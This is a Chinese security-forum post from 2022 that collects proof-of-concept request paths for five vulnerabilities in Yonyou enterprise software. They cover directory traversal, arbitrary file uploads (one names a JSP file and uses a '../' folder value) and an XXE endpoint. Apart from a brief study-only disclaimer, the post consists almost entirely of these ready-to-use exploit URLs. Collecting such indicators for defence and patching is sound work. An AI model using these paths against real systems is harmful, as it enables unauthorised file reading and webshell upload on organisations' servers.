请选择 进入手机版 | 继续访问电脑版

DecoyMini 技术交流社区

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
查看: 4021|回复: 0

[2022HW] 用友漏洞 PoC 整理

[复制链接]

172

主题

33

回帖

30

荣誉

Rank: 9Rank: 9Rank: 9

UID
2
积分
338
精华
1
沃币
2 枚
注册时间
2021-6-24

论坛管理

发表于 2022-8-4 10:26:48 | 显示全部楼层 |阅读模式
本文内容为互联网上收集,禁止用于非法用途,仅供学习使用!

1、用友 FE 协作办公平台目录遍历


templateOfTaohong_manager.jsp

  1. /system/mediafile/templateofTaoHong_manager.jsp?path={{{path}}}
复制代码

2、用友 GRP-U8 财务管理软件任意文件上传


  1. /UploadFileData?action=upload_file&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=181=1&1=1&1=1&1=1&1=1&1=1&1=1&1=181=1&1=1&1=1&1=181=1&1=1&1=1&foldername=%2e%2e%2f&filename=
复制代码

3、用友 NC 系统 uapws wsdl XXE


  1. /uapws/service/nc.uap.oba.update.IUpdateService?xsd={{{xmlUrl}}}
复制代码

4、用友 u8 cloud 任意文件上传漏洞


/nccloud 前台文件上传

  1. /hrss/servlet/uploadimg2File
复制代码

5、用友时空 KSOA 软件前台文件上传漏洞


  1. /servlet/com.sksoft.bill.ImageUpload?filepath=/&filename=gmtxj.jsp
复制代码

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|小黑屋|DecoyMini 技术交流社区 ( 京ICP备2021005070号 )

GMT+8, 2024-3-28 20:07 , Processed in 0.058445 second(s), 26 queries .

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表